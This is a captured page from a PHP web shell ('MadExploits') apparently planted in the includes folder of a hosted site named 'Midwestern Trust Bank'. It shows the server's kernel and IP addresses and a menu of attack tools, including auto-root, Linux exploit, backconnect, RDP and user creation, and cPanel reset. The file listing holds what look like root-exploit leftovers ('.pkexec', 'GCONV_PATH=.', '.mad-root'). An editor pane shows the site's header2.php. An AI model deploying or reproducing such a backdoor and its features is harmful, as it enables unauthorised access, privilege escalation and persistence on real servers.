Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
5.26
KB
-rw-r--r--
footer.php
2.07
KB
-rw-r--r--
footer2.php
7.72
KB
-rw-r--r--
header.php
3.05
KB
-rw-r--r--
header2.php
1.74
KB
-rw-r--r--
main_content.php
4.86
KB
-rw-r--r--
navbar.php
10.83
KB
-rw-r--r--
navbar2.php
3.95
KB
-rw-r--r--
profile.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header2.php
<?php session_start();?> <?php error_reporting(0); if(isset($_COOKIE['sess_user'])){ ?> <script type="text/javascript"> window.location.href = "home.php?pageno=1" </script> <?php } if(isset($_GET['referrer'])){ $referrer = $_GET['referrer']; $_SESSION['sess_referrer'] = $referrer; $_COOKIE['sess_referrer'] = $referrer; setcookie("sess_referrer", $referrer, time()+3600000); $referrer = $_SESSION['sess_referrer']; } date_default_timezone_set(); $domain_name="www.midwest-tb.com"; $site_name ="Midwestern Trust Bank"; $site_name2 ="Your Financial status is in good hands"; $webmail="support@midwest-tb.com"; $call="+18123798653"; $site_address ="4720 Grandview Dr, Logansport, IN 46947"; include("db.php"); include("functions.php"); include("functions/mobile_detect.php"); $site =$_SERVER["REQUEST_URI"]; $_SESSION['sess_user'] = $_SESSION['sess_user']; $user = $_SESSION['sess_user']; $base_url = $_SERVER['PHP_SELF']; ?> <!DOCTYPE html> <html> <head> <meta name="theme-color" content="#000000" /> <meta name="google-site-verification" content="" /><meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Favicon --> <link rel="icon" href="assets/img/core-img/favicon.png"> <!-- Stylesheet --> <link rel="stylesheet" href="assets/style.css"> </head> </head> <?php ?> <style type="text/css"> #wrap{ white-space: pre-wrap; } #orange, .orange, .capTitle{ color: #fe971a !important; } .white, #white{ color: white!important; } </style>
Close